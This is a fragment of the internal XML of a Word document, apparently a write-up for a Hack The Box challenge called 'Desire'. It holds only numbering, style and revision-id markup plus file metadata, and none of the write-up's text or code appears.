    <w:tmpl w:val="48D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E47CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96C0D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E3A16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="357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876A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C6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608EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3F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849EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F03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41A76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEB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76CFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D598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756FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F0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07BBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACA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43FB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="900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8408">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="219364829">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1549953300">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1143234735">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="672683865">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1820803595">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1423532007">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1894728097">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="263657504">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="693581428">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="602033601">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1800955374">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1234900404">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="274338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formsDesig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FD"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="00026C8A"/>
    <w:rsid w:val="0007566C"/>
    <w:rsid w:val="000763E6"/>
    <w:rsid w:val="00090CB1"/>
    <w:rsid w:val="0009508A"/>
    <w:rsid w:val="00095A6E"/>
    <w:rsid w:val="000D2D7D"/>
    <w:rsid w:val="000D5934"/>
    <w:rsid w:val="000F1B6F"/>
    <w:rsid w:val="000F3605"/>
    <w:rsid w:val="001023B5"/>
    <w:rsid w:val="001064F0"/>
    <w:rsid w:val="0010685A"/>
    <w:rsid w:val="001107B8"/>
    <w:rsid w:val="00113731"/>
    <w:rsid w:val="00125F98"/>
    <w:rsid w:val="001364ED"/>
    <w:rsid w:val="00146C7B"/>
    <w:rsid w:val="00156752"/>
    <w:rsid w:val="00161061"/>
    <w:rsid w:val="00183EB3"/>
    <w:rsid w:val="001A223F"/>
    <w:rsid w:val="001B11C3"/>
    <w:rsid w:val="001B7C9C"/>
    <w:rsid w:val="001D63AA"/>
    <w:rsid w:val="001E0975"/>
    <w:rsid w:val="001F0B83"/>
    <w:rsid w:val="002053E8"/>
    <w:rsid w:val="00215CF9"/>
    <w:rsid w:val="00216F38"/>
    <w:rsid w:val="002332DD"/>
    <w:rsid w:val="0024207F"/>
    <w:rsid w:val="00254B5C"/>
    <w:rsid w:val="00262A21"/>
    <w:rsid w:val="002662F2"/>
    <w:rsid w:val="00270241"/>
    <w:rsid w:val="00285BC9"/>
    <w:rsid w:val="002A7125"/>
    <w:rsid w:val="002B5D42"/>
    <w:rsid w:val="002C714A"/>
    <w:rsid w:val="002C7C5F"/>
    <w:rsid w:val="002D02D9"/>
    <w:rsid w:val="002E6AC8"/>
    <w:rsid w:val="002F778B"/>
    <w:rsid w:val="003029E4"/>
    <w:rsid w:val="003142E7"/>
    <w:rsid w:val="003217A1"/>
    <w:rsid w:val="003348E0"/>
    <w:rsid w:val="00344FB3"/>
    <w:rsid w:val="00383A59"/>
    <w:rsid w:val="003D6F23"/>
    <w:rsid w:val="003E1239"/>
    <w:rsid w:val="003E605B"/>
    <w:rsid w:val="003E7F38"/>
    <w:rsid w:val="003F08A0"/>
    <w:rsid w:val="00400CE7"/>
    <w:rsid w:val="00406B65"/>
    <w:rsid w:val="00422A6F"/>
    <w:rsid w:val="004411DF"/>
    <w:rsid w:val="00460B6D"/>
    <w:rsid w:val="0047344D"/>
    <w:rsid w:val="004743B8"/>
    <w:rsid w:val="004B52A9"/>
    <w:rsid w:val="004D16CA"/>
    <w:rsid w:val="004D3AC1"/>
    <w:rsid w:val="00504F70"/>
    <w:rsid w:val="00505869"/>
    <w:rsid w:val="00510E30"/>
    <w:rsid w:val="00512889"/>
    <w:rsid w:val="00527195"/>
    <w:rsid w:val="005308C3"/>
    <w:rsid w:val="0053486C"/>
    <w:rsid w:val="005401D9"/>
    <w:rsid w:val="00552A66"/>
    <w:rsid w:val="005632AF"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005D27CF"/>
    <w:rsid w:val="005D50D0"/>
    <w:rsid w:val="006010D7"/>
    <w:rsid w:val="0060154B"/>
    <w:rsid w:val="006127C4"/>
    <w:rsid w:val="0061625B"/>
    <w:rsid w:val="006208D4"/>
    <w:rsid w:val="006223FE"/>
    <w:rsid w:val="0062454A"/>
    <w:rsid w:val="0063458E"/>
    <w:rsid w:val="00645628"/>
    <w:rsid w:val="006546FE"/>
    <w:rsid w:val="00661B4F"/>
    <w:rsid w:val="00662B20"/>
    <w:rsid w:val="00681147"/>
    <w:rsid w:val="006B2E0C"/>
    <w:rsid w:val="006C48A6"/>
    <w:rsid w:val="006C4EED"/>
    <w:rsid w:val="006E0205"/>
    <w:rsid w:val="006F6D8E"/>
    <w:rsid w:val="007038DF"/>
    <w:rsid w:val="00715475"/>
    <w:rsid w:val="00716084"/>
    <w:rsid w:val="007310C1"/>
    <w:rsid w:val="00734567"/>
    <w:rsid w:val="00770D2B"/>
    <w:rsid w:val="007710FD"/>
    <w:rsid w:val="00777FDB"/>
    <w:rsid w:val="007B58C4"/>
    <w:rsid w:val="007B7841"/>
    <w:rsid w:val="007C75D1"/>
    <w:rsid w:val="007D703B"/>
    <w:rsid w:val="007E2996"/>
    <w:rsid w:val="007F14DB"/>
    <w:rsid w:val="007F6C1C"/>
    <w:rsid w:val="00810D85"/>
    <w:rsid w:val="00815830"/>
    <w:rsid w:val="0085778E"/>
    <w:rsid w:val="00861F96"/>
    <w:rsid w:val="008765E8"/>
    <w:rsid w:val="00891F49"/>
    <w:rsid w:val="00893313"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008B0612"/>
    <w:rsid w:val="008B6677"/>
    <w:rsid w:val="008C1AA9"/>
    <w:rsid w:val="008C7C5D"/>
    <w:rsid w:val="008E08E9"/>
    <w:rsid w:val="008E186F"/>
    <w:rsid w:val="0091015C"/>
    <w:rsid w:val="00916604"/>
    <w:rsid w:val="00937C45"/>
    <w:rsid w:val="00950027"/>
    <w:rsid w:val="009574E2"/>
    <w:rsid w:val="00986E89"/>
    <w:rsid w:val="009C5F5E"/>
    <w:rsid w:val="009D2954"/>
    <w:rsid w:val="00A00B46"/>
    <w:rsid w:val="00A02B76"/>
    <w:rsid w:val="00A04FD2"/>
    <w:rsid w:val="00A12F54"/>
    <w:rsid w:val="00A15427"/>
    <w:rsid w:val="00A17786"/>
    <w:rsid w:val="00A31005"/>
    <w:rsid w:val="00A43657"/>
    <w:rsid w:val="00A503D6"/>
    <w:rsid w:val="00A52F39"/>
    <w:rsid w:val="00A90287"/>
    <w:rsid w:val="00A910CC"/>
    <w:rsid w:val="00AF0F69"/>
    <w:rsid w:val="00B008B2"/>
    <w:rsid w:val="00B403AE"/>
    <w:rsid w:val="00B4194F"/>
    <w:rsid w:val="00B535AB"/>
    <w:rsid w:val="00B62357"/>
    <w:rsid w:val="00B772A0"/>
    <w:rsid w:val="00BC7FA2"/>
    <w:rsid w:val="00BE0617"/>
    <w:rsid w:val="00BF4294"/>
    <w:rsid w:val="00C103E6"/>
    <w:rsid w:val="00C15552"/>
    <w:rsid w:val="00C25A67"/>
    <w:rsid w:val="00C305AB"/>
    <w:rsid w:val="00C33316"/>
    <w:rsid w:val="00C34835"/>
    <w:rsid w:val="00C36809"/>
    <w:rsid w:val="00C41045"/>
    <w:rsid w:val="00C56BD8"/>
    <w:rsid w:val="00C672D3"/>
    <w:rsid w:val="00C75CA5"/>
    <w:rsid w:val="00C91B65"/>
    <w:rsid w:val="00C9651B"/>
    <w:rsid w:val="00CA01B4"/>
    <w:rsid w:val="00CA5073"/>
    <w:rsid w:val="00CA7DCF"/>
    <w:rsid w:val="00CB12BE"/>
    <w:rsid w:val="00CB52C6"/>
    <w:rsid w:val="00CB6820"/>
    <w:rsid w:val="00CF4C40"/>
    <w:rsid w:val="00D070C3"/>
    <w:rsid w:val="00D2222B"/>
    <w:rsid w:val="00D37FD4"/>
    <w:rsid w:val="00D57260"/>
    <w:rsid w:val="00D60413"/>
    <w:rsid w:val="00D6670F"/>
    <w:rsid w:val="00D8384D"/>
    <w:rsid w:val="00D874C1"/>
    <w:rsid w:val="00D92219"/>
    <w:rsid w:val="00D971B9"/>
    <w:rsid w:val="00DA7AD5"/>
    <w:rsid w:val="00DB2ED8"/>
    <w:rsid w:val="00DD0931"/>
    <w:rsid w:val="00DE27D3"/>
    <w:rsid w:val="00DE5C79"/>
    <w:rsid w:val="00DF1A80"/>
    <w:rsid w:val="00DF506B"/>
    <w:rsid w:val="00E0028F"/>
    <w:rsid w:val="00E0104A"/>
    <w:rsid w:val="00E04875"/>
    <w:rsid w:val="00E423A6"/>
    <w:rsid w:val="00E53F53"/>
    <w:rsid w:val="00E56CF5"/>
    <w:rsid w:val="00EC267B"/>
    <w:rsid w:val="00EC3BCE"/>
    <w:rsid w:val="00EC7577"/>
    <w:rsid w:val="00ED2E49"/>
    <w:rsid w:val="00ED40BE"/>
    <w:rsid w:val="00ED4D9C"/>
    <w:rsid w:val="00EF48D7"/>
    <w:rsid w:val="00F02320"/>
    <w:rsid w:val="00F05CD3"/>
    <w:rsid w:val="00F20E0E"/>
    <w:rsid w:val="00F553CA"/>
    <w:rsid w:val="00F61E20"/>
    <w:rsid w:val="00F64A83"/>
    <w:rsid w:val="00F82712"/>
    <w:rsid w:val="00F90A11"/>
    <w:rsid w:val="00FB0B30"/>
    <w:rsid w:val="00FB0E08"/>
    <w:rsid w:val="00FB421F"/>
    <w:rsid w:val="00FC0750"/>
    <w:rsid w:val="00FC14B6"/>
    <w:rsid w:val="00FC3232"/>
    <w:rsid w:val="00FC7CFE"/>
    <w:rsid w:val="00FE7251"/>
    <w:rsid w:val="00FF2B47"/>
    <w:rsid w:val="00FF4C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6BF4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A7117D5-7359-4E29-B982-DA4D5748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0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0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0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0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0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0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0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0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0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0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0FD"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00771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0FD"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="007710FD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007710FD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="007710FD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00771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0FD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="007710FD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007710FD"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007710FD"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00161061"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004411DF"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00552A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app.hackthebox.com/challenges/Desire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2508</TotalTime>
  <Pages>28</Pages>
  <Words>3808</Words>
  <Characters>21709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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-21T13:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-23T07:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>